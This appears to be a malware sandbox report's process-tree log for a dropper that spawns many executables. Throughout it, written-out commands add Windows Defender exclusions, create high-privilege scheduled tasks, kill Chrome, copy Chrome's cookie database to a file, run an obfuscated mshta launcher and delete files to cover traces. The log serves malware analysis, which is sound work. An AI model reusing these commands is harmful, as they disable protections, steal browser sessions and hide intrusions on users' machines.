C:\Users\Admin\Pictures\Adobe Films\Gbj64GgjHOmgsLq9f2vD2Def.exe"C:\Users\Admin\Pictures\Adobe Films\Gbj64GgjHOmgsLq9f2vD2Def.exe"6⤵PID:5588
-
-
C:\Users\Admin\Pictures\Adobe Films\eeUsra3KO3F8pRjymnsB0nXP.exe"C:\Users\Admin\Pictures\Adobe Films\eeUsra3KO3F8pRjymnsB0nXP.exe"6⤵PID:5708
-
-
C:\Users\Admin\Pictures\Adobe Films\y6BrMPmK5ph61VVOpJvALchW.exe"C:\Users\Admin\Pictures\Adobe Films\y6BrMPmK5ph61VVOpJvALchW.exe"6⤵PID:5348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵PID:5260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵PID:6180
-
-
-
C:\Users\Admin\Pictures\Adobe Films\sqwQeI1eYHHnuOLtHzZ2ML0_.exe"C:\Users\Admin\Pictures\Adobe Films\sqwQeI1eYHHnuOLtHzZ2ML0_.exe"6⤵PID:5812
-
-
C:\Users\Admin\Pictures\Adobe Films\fK9g8eZ9t6yVzxfwet1amDUU.exe"C:\Users\Admin\Pictures\Adobe Films\fK9g8eZ9t6yVzxfwet1amDUU.exe"6⤵PID:5880
-
-
C:\Users\Admin\Pictures\Adobe Films\2E100bKotanh9fLG2KBQfsFN.exe"C:\Users\Admin\Pictures\Adobe Films\2E100bKotanh9fLG2KBQfsFN.exe"6⤵PID:5932
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:4192
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:4948
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\HjLCibFOi2YJXX4_J1Ao_Lnc.exe"C:\Users\Admin\Pictures\Adobe Films\HjLCibFOi2YJXX4_J1Ao_Lnc.exe"6⤵PID:5872
-
-
C:\Users\Admin\Pictures\Adobe Films\1j_af0aQ1vhAfBBQxi9h3oZE.exe"C:\Users\Admin\Pictures\Adobe Films\1j_af0aQ1vhAfBBQxi9h3oZE.exe"6⤵PID:5144
-
-
C:\Users\Admin\Pictures\Adobe Films\CEzFZCZOex2S8chk5mYyOsMe.exe"C:\Users\Admin\Pictures\Adobe Films\CEzFZCZOex2S8chk5mYyOsMe.exe"6⤵PID:4788
-
-
C:\Users\Admin\Pictures\Adobe Films\3pyvDF5BcyhBADQASRHdE_kU.exe"C:\Users\Admin\Pictures\Adobe Films\3pyvDF5BcyhBADQASRHdE_kU.exe"6⤵PID:3576
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵PID:5740
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gJvKZNOeZzxVnAeqDvQvn9WO.exe"C:\Users\Admin\Pictures\Adobe Films\gJvKZNOeZzxVnAeqDvQvn9WO.exe"6⤵PID:3168
-
-
C:\Users\Admin\Pictures\Adobe Films\2DYQvtIh3ce8724on5V09oIc.exe"C:\Users\Admin\Pictures\Adobe Films\2DYQvtIh3ce8724on5V09oIc.exe"6⤵PID:740
-
-
C:\Users\Admin\Pictures\Adobe Films\Vkki9EWhRfFG3swXd2uwRJKl.exe"C:\Users\Admin\Pictures\Adobe Films\Vkki9EWhRfFG3swXd2uwRJKl.exe"6⤵PID:2220
-
-
C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"6⤵PID:1168
-
-
C:\Users\Admin\Pictures\Adobe Films\q7eIVhHVwNzS8Z03T3qBYNfn.exe"C:\Users\Admin\Pictures\Adobe Films\q7eIVhHVwNzS8Z03T3qBYNfn.exe"6⤵PID:644
-
-
C:\Users\Admin\Pictures\Adobe Films\nGGzH035fd28Rex9K2YjI1D8.exe"C:\Users\Admin\Pictures\Adobe Films\nGGzH035fd28Rex9K2YjI1D8.exe"6⤵PID:5048
-
-
C:\Users\Admin\Pictures\Adobe Films\6VKDl7znAfYnyGKVQb1ZkqIH.exe"C:\Users\Admin\Pictures\Adobe Films\6VKDl7znAfYnyGKVQb1ZkqIH.exe"6⤵PID:3248
-
C:\Users\Admin\Documents\uIrgCCwCkXNkltWaSsazxtRg.exe"C:\Users\Admin\Documents\uIrgCCwCkXNkltWaSsazxtRg.exe"7⤵PID:6148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:6192
-
-
-
C:\Users\Admin\Pictures\Adobe Films\i0K_H6Cs2RJCTWPiOUYD37pl.exe"C:\Users\Admin\Pictures\Adobe Films\i0K_H6Cs2RJCTWPiOUYD37pl.exe"6⤵PID:2400
-
-
C:\Users\Admin\Pictures\Adobe Films\vH3tKOl06Wfs5SENTRp7envA.exe"C:\Users\Admin\Pictures\Adobe Films\vH3tKOl06Wfs5SENTRp7envA.exe"6⤵PID:5720
-
-
C:\Users\Admin\Pictures\Adobe Films\kFJFPA7cj6Dr2QL7L7i0pE1P.exe"C:\Users\Admin\Pictures\Adobe Films\kFJFPA7cj6Dr2QL7L7i0pE1P.exe"6⤵PID:2512
-
-
C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe"C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe"6⤵PID:3988
-
C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe"C:\Users\Admin\Pictures\Adobe Films\yCEgBJRApotvw9FnwRTSEAcH.exe" -u7⤵PID:920
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe"C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe"6⤵PID:1320
-
C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe"C:\Users\Admin\Pictures\Adobe Films\rbywTHqSWbLrOQInar2AKrbZ.exe" -u7⤵PID:2092
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun108e4051ef0.exe4⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun108e4051ef0.exeSun108e4051ef0.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10d73b7785b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10d73b7785b.exeSun10d73b7785b.exe5⤵
- Executes dropped EXE
PID:628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Sun10d73b7785b.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10d73b7785b.exe" & del C:\ProgramData\*.dll & exit6⤵PID:4600
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Sun10d73b7785b.exe /f7⤵
- Kills process with taskkill
PID:4752
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1074b86ebb831862.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1074b86ebb831862.exeSun1074b86ebb831862.exe5⤵
- Executes dropped EXE
PID:3700 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" .\2c3M8M5c.RJ6⤵PID:3052
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ7⤵
- Loads dropped DLL
PID:1064 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ8⤵PID:5992
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\2c3M8M5c.RJ9⤵PID:2456
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1050791613c996ff.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10aa9ae1c57b995f.exe4⤵PID:3376
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10aa9ae1c57b995f.exeSun10aa9ae1c57b995f.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10aa9ae1c57b995f.exeC:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10aa9ae1c57b995f.exe6⤵
- Executes dropped EXE
PID:4104
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10df2d13b8e171d6f.exe4⤵PID:1088
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10df2d13b8e171d6f.exeSun10df2d13b8e171d6f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2096 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:4924
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4396
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10ee0af6c65e215a.exe4⤵PID:2364
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10ee0af6c65e215a.exeSun10ee0af6c65e215a.exe5⤵
- Executes dropped EXE
PID:2456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun106a84a94b0.exe4⤵PID:1636
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun106a84a94b0.exeSun106a84a94b0.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Users\Admin\AppData\Local\c0a2c849-5063-4935-ab6d-e64215a5a417.exe"C:\Users\Admin\AppData\Local\c0a2c849-5063-4935-ab6d-e64215a5a417.exe"6⤵
- Executes dropped EXE
PID:1812
-
-
C:\Users\Admin\AppData\Local\d447a67e-39e8-4f6a-a12a-e9f5d8a8ff8d.exe"C:\Users\Admin\AppData\Local\d447a67e-39e8-4f6a-a12a-e9f5d8a8ff8d.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2932 -
C:\Users\Admin\AppData\Roaming\31062152\4742347347423473.exe"C:\Users\Admin\AppData\Roaming\31062152\4742347347423473.exe"7⤵
- Executes dropped EXE
PID:4912
-
-
-
C:\Users\Admin\AppData\Local\f67369eb-64f2-4d2e-af91-189ade5f689a.exe"C:\Users\Admin\AppData\Local\f67369eb-64f2-4d2e-af91-189ade5f689a.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4288
-
-
C:\Users\Admin\AppData\Local\99bc6450-4f49-4a6d-b27a-543ddf1db221.exe"C:\Users\Admin\AppData\Local\99bc6450-4f49-4a6d-b27a-543ddf1db221.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4416
-
-
C:\Users\Admin\AppData\Local\927c01de-e6a5-4887-8d30-8616657f8e14.exe"C:\Users\Admin\AppData\Local\927c01de-e6a5-4887-8d30-8616657f8e14.exe"6⤵
- Executes dropped EXE
PID:4500 -
C:\Users\Admin\AppData\Roaming\2480812.exe"C:\Users\Admin\AppData\Roaming\2480812.exe"7⤵PID:1308
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",8⤵PID:1884
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",9⤵PID:4856
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",10⤵PID:4984
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",11⤵PID:4380
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10fe8cb62035134.exe4⤵PID:1668
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exeSun10fe8cb62035134.exe5⤵
- Executes dropped EXE
PID:2424 -
C:\Users\Admin\AppData\Local\Temp\is-6P3VE.tmp\Sun10fe8cb62035134.tmp"C:\Users\Admin\AppData\Local\Temp\is-6P3VE.tmp\Sun10fe8cb62035134.tmp" /SL5="$101F6,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe"C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe" /SILENT7⤵
- Executes dropped EXE
PID:3304 -
C:\Users\Admin\AppData\Local\Temp\is-ARV1T.tmp\Sun10fe8cb62035134.tmp"C:\Users\Admin\AppData\Local\Temp\is-ARV1T.tmp\Sun10fe8cb62035134.tmp" /SL5="$1020C,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fe8cb62035134.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1348 -
C:\Users\Admin\AppData\Local\Temp\is-GC57M.tmp\windllhost.exe"C:\Users\Admin\AppData\Local\Temp\is-GC57M.tmp\windllhost.exe" 779⤵
- Executes dropped EXE
PID:4308
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10de08ca9cb.exe4⤵PID:1452
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10de08ca9cb.exeSun10de08ca9cb.exe5⤵
- Executes dropped EXE
PID:3456 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" .\2c3M8M5c.RJ6⤵PID:1344
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ7⤵
- Loads dropped DLL
PID:1268 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\2c3M8M5c.RJ8⤵PID:5312
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\2c3M8M5c.RJ9⤵PID:4076
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10f51ad6615.exe4⤵PID:1332
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f51ad6615.exeSun10f51ad6615.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2240 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f51ad6615.exeC:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f51ad6615.exe6⤵
- Executes dropped EXE
PID:4116
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10f1b87ddac.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10fd677cdc.exe4⤵PID:1440
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10fd677cdc.exeSun10fd677cdc.exe5⤵
- Executes dropped EXE
PID:3488 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:1392
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:4656
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1084932dd6b.exe /mixtwo4⤵PID:3612
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1084932dd6b.exeSun1084932dd6b.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1844
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1050791613c996ff.exeSun1050791613c996ff.exe1⤵
- Executes dropped EXE
PID:2916 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1050791613c996ff.exe"C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1050791613c996ff.exe" -u2⤵
- Executes dropped EXE
PID:2208
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10f1b87ddac.exeSun10f1b87ddac.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1256
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1084932dd6b.exeSun1084932dd6b.exe /mixtwo1⤵
- Executes dropped EXE
PID:3932 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun1084932dd6b.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun1084932dd6b.exe" & exit2⤵PID:4472
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun1084932dd6b.exe" /f3⤵
- Kills process with taskkill
PID:4348
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1448 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5116
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4356
-
C:\Program Files (x86)\Company\NewProduct\OneCleanerInst931928.exe"C:\Program Files (x86)\Company\NewProduct\OneCleanerInst931928.exe"1⤵PID:5980
-
C:\Users\Admin\AppData\Local\8614b2dc-fb94-41df-8f04-2badc1c6dd31.exe"C:\Users\Admin\AppData\Local\8614b2dc-fb94-41df-8f04-2badc1c6dd31.exe"2⤵PID:5756
-
-
C:\Users\Admin\AppData\Local\6b0c8fb6-e9d8-4393-90f8-9013c368aca8.exe"C:\Users\Admin\AppData\Local\6b0c8fb6-e9d8-4393-90f8-9013c368aca8.exe"2⤵PID:6164
-
-
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"1⤵PID:5972
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:3796
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose (CREatEObJECT ("wSCripT.sHeLl" ).Run ("C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """"== """" for %e In (""C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"" ) do taskkill /iM ""%~Nxe"" -f ",0 , TrUe ) )1⤵PID:5956
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe"> ..\ZCJQBxDe1bLl.exE &&staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If ""== "" for %e In ("C:\Users\Admin\Pictures\Adobe Films\m3GJY76KHkrUvSQv6yEtaHM4.exe" ) do taskkill /iM "%~Nxe" -f2⤵PID:4588
-
C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe3⤵PID:5572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "m3GJY76KHkrUvSQv6yEtaHM4.exe" -f3⤵
- Kills process with taskkill
PID:2284
-
-
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"1⤵PID:5944